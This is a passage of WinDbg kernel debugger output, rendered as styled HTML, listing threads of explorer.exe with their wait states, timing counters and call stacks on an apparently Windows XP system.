margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 8250b008: (0006,01b4) Flags: 00000000 Mdl: 00000000<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 823a8e48: (0006,01b4) Flags: 00000000 Mdl: 00000000<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 823b4860: (0006,01b4) Flags: 00000000 Mdl: 00000000<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 822ad400: (0006,01b4) Flags: 00000000 Mdl: 00000000<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 823d6368: (0006,01b4) Flags: 00000000 Mdl: 00000000<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 8284c3a0: (0006,01b4) Flags: 00000000 Mdl: 00000000<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 821ee450: (0006,01b4) Flags: 00000000 Mdl: 00000000<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 82209910: (0006,0190) Flags: 00000000 Mdl: 00000000<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 824b3008: (0006,0190) Flags: 00000000 Mdl: 00000000<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 823e0008: (0006,0190) Flags: 00000000 Mdl: 00000000<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 8291c6c8: (0006,0190) Flags: 00000000 Mdl: 00000000<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 827ef008: (0006,0190) Flags: 00000000 Mdl: 00000000<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> <span style="color: #0000ff">Not</span> impersonating<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DeviceMap e1cba0b0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Owning Process 827f9020 Image: explorer.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Attached Process N/A Image: N/A<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Wait Start TickCount 696150 Ticks: 643 (0:00:00:10.046)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Context Switch Count 20457 LargeStack<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> UserTime 00:00:00.078<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> KernelTime 00:00:00.718<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Win32 Start Address SHLWAPI!WrapperThreadProc (0x77f7f56f)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Start Address kernel32!BaseThreadStartThunk (0x7c810856)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Stack Init b2989000 Current b298895c Base b2989000 Limit b2985000 <span style="color: #0000ff">Call</span> 0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Priority 10 BasePriority 8 PriorityDecrement 0 DecrementCount 16<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> ChildEBP RetAddr <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b2988974 8050017a nt!KiSwapContext+0x2e (FPO: [Uses EBP] [0,0,4])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b2988980 804f973e nt!KiSwapThread+0x46 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b29889b8 805b4d6a nt!KeWaitForMultipleObjects+0x284 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b2988d48 8053c808 nt!NtWaitForMultipleObjects+0x2a2 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b2988d48 7c90eb94 nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame @ b2988d64)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 011bfd2c 7c90e9ab ntdll!KiFastSystemCallRet (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 011bfd30 7c8094f2 ntdll!ZwWaitForMultipleObjects+0xc (FPO: [5,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 011bfdcc 77d4bbfe kernel32!WaitForMultipleObjectsEx+0x12c (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 011bfe28 7c9f43d9 USER32!RealMsgWaitForMultipleObjectsEx+0x13e (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 011bff4c 7ca3114e SHELL32!CChangeNotify::_MessagePump+0x3b (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 011bff50 77f7f5de SHELL32!CChangeNotify::ThreadProc+0x1e (FPO: [1,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 011bffb4 7c80b50b SHLWAPI!WrapperThreadProc+0x94 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 011bffec 00000000 kernel32!BaseThreadStart+0x37 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> THREAD 827eada8 Cid 0594.06f4 Teb: 7ffac000 Win32Thread: e1c436a8 WAIT: (WrUserRequest) UserMode <br /><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">Non-Alertable<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 82491ff0 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> <span style="color: #0000ff">Not</span> impersonating<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DeviceMap e1cba0b0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Owning Process 827f9020 Image: explorer.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Attached Process N/A Image: N/A<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Wait Start TickCount 696150 Ticks: 643 (0:00:00:10.046)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Context Switch Count 105062 LargeStack<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> UserTime 00:00:00.234<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> KernelTime 00:00:04.703<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Win32 Start Address stobject!CSysTray::SysTrayThreadProc (0x762836f7)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Start Address kernel32!BaseThreadStartThunk (0x7c810856)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Stack Init b286e000 Current b286dc20 Base b286e000 Limit b286a000 <span style="color: #0000ff">Call</span> 0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Priority 12 BasePriority 8 PriorityDecrement 2 DecrementCount 16<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> ChildEBP RetAddr <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b286dc38 8050017a nt!KiSwapContext+0x2e (FPO: [Uses EBP] [0,0,4])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b286dc44 804f99be nt!KiSwapThread+0x46 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b286dc6c bf802ec4 nt!KeWaitForSingleObject+0x1c2 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">WARNING: Frame IP <span style="color: #0000ff">not</span> <span style="color: #0000ff">in</span> any known module. Following frames may be wrong.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b286dd4c 8053c808 0xbf802ec4<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b286dd4c 014efd68 nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame-EDITED @ b286dcec)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b286dd64 00000000 0x14efd68<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> THREAD 823f5da8 Cid 0594.071c Teb: 7ffab000 Win32Thread: 00000000 WAIT: (UserRequest) UserMode <br /><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">Non-Alertable<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 823c88f8 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 828f06e8 NotificationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> <span style="color: #0000ff">Not</span> impersonating<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> DeviceMap e1cba0b0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Owning Process 827f9020 Image: explorer.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Attached Process N/A Image: N/A<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Wait Start TickCount 696150 Ticks: 643 (0:00:00:10.046)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Context Switch Count 3 <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> UserTime 00:00:00.000<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> KernelTime 00:00:00.000<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Win32 Start Address wdmaud!MixerCallbackThread (0x72d230e8)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Start Address kernel32!BaseThreadStartThunk (0x7c810856)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Stack Init b28d1000 Current b28d095c Base b28d1000 Limit b28ce000 <span style="color: #0000ff">Call</span> 0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Priority 15 BasePriority 15 PriorityDecrement 0 DecrementCount 0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> ChildEBP RetAddr <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b28d0974 8050017a nt!KiSwapContext+0x2e (FPO: [Uses EBP] [0,0,4])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b28d0980 804f973e nt!KiSwapThread+0x46 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b28d09b8 805b4d6a nt!KeWaitForMultipleObjects+0x284 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b28d0d48 8053c808 nt!NtWaitForMultipleObjects+0x2a2 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b28d0d48 7c90eb94 nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame @ b28d0d64)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0152fecc 7c90e9ab ntdll!KiFastSystemCallRet (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0152fed0 7c8094f2 ntdll!ZwWaitForMultipleObjects+0xc (FPO: [5,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0152ff6c 7c809c86 kernel32!WaitForMultipleObjectsEx+0x12c (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0152ff88 72d2312a kernel32!WaitForMultipleObjects+0x18 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0152ffb4 7c80b50b wdmaud!MixerCallbackThread+0x42 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0152ffec 00000000 kernel32!BaseThreadStart+0x37 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> THREAD 8245dda8 Cid 0594.0738 Teb: 7ffae000 Win32Thread: e1917078 WAIT: (WrUserRequest) UserMode <br /><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">Non-Alertable<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 82904680 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> <span style="color: #0000ff">Not</span> impersonating<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> DeviceMap e1cba0b0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Owning Process 827f9020 Image: explorer.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Attached Process N/A Image: N/A<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Wait Start TickCount 696150 Ticks: 643 (0:00:00:10.046)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Context Switch Count 895 LargeStack<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> UserTime 00:00:00.015<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> KernelTime 00:00:01.062<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Win32 Start Address WINMM!mciwindow (0x76b44dd6)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Start Address kernel32!BaseThreadStartThunk (0x7c810856)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Stack Init b2b81000 Current b2b80c20 Base b2b81000 Limit b2b7e000 <span style="color: #0000ff">Call</span> 0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Priority 12 BasePriority 10 PriorityDecrement 0 DecrementCount 16<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> ChildEBP RetAddr <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b2b80c38 8050017a nt!KiSwapContext+0x2e (FPO: [Uses EBP] [0,0,4])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b2b80c44 804f99be nt!KiSwapThread+0x46 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b2b80c6c bf802ec4 nt!KeWaitForSingleObject+0x1c2 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">WARNING: Frame IP <span style="color: #0000ff">not</span> <span style="color: #0000ff">in</span> any known module. Following frames may be wrong.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b2b80d4c 8053c808 0xbf802ec4<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b2b80d4c 0166ff98 nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame-EDITED @ b2b80cec)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b2b80d64 00000000 0x166ff98<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> THREAD 823cc520 Cid 0594.074c Teb: 7ffaa000 Win32Thread: e2079418 WAIT: (UserRequest) UserMode <br /><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">Non-Alertable<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 827ec190 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 822d2810 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> <span style="color: #0000ff">Not</span> impersonating<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DeviceMap e1cba0b0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Owning Process 827f9020 Image: explorer.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Attached Process N/A Image: N/A<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Wait Start TickCount 696151 Ticks: 642 (0:00:00:10.031)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Context Switch Count 14411 LargeStack<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> UserTime 00:00:06.031<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> KernelTime 00:00:14.203<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Win32 Start Address BROWSEUI!BrowserProtectedThreadProc (0x75fae9d5)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Start Address kernel32!BaseThreadStartThunk (0x7c810856)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Stack Init b2a70c80 Current b2a705dc Base b2a71000 Limit b2a6d000 <span style="color: #0000ff">Call</span> b2a70c80<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Priority 12 BasePriority 8 PriorityDecrement 2 DecrementCount 16<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> ChildEBP RetAddr <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b2a705f4 8050017a nt!KiSwapContext+0x2e (FPO: [Uses EBP] [0,0,4])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b2a70600 804f973e nt!KiSwapThread+0x46 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b2a70638 805b4d6a nt!KeWaitForMultipleObjects+0x284 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b2a709c8 8053c808 nt!NtWaitForMultipleObjects+0x2a2 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b2a709c8 7c90eb94 nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame @ b2a709e4)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 016afb48 7c90e9ab ntdll!KiFastSystemCallRet (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 016afb4c 7c8094f2 ntdll!ZwWaitForMultipleObjects+0xc (FPO: [5,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 016afbe8 77d4bbfe kernel32!WaitForMultipleObjectsEx+0x12c (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 016afc44 6c1e4b92 USER32!RealMsgWaitForMultipleObjectsEx+0x13e (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 016afc64 6c1e4cfd DUSER!CoreSC::Wait+0x3a (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 016afc88 6c1e4ef9 DUSER!CoreSC::WaitMessage+0x40 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 016afc98 77d88a2c DUSER!MphWaitMessageEx+0x22 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 016afcb4 7c90eae3 USER32!__ClientWaitMessageExMPH+0x1e (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 016afcb4 804feb6c ntdll!KiUserCallbackDispatcher+0x13 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b2a70c98 80595bbf nt!KiCallUserMode+0x4 (FPO: [2,3,4])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b2a70cf4 bf92a862 nt!KeUserModeCallback+0x87 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">WARNING: Frame IP <span style="color: #0000ff">not</span> <span style="color: #0000ff">in</span> any known module. Following frames may be wrong.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b2a70d5c 8053c808 0xbf92a862<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b2a70d5c 7c90eb94 nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame @ b2a70d64)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 016afcb4 7c90eae3 ntdll!KiFastSystemCallRet (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 016afcc8 77d493f5 ntdll!KiUserCallbackDispatcher+0x13 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 016aff28 75faea19 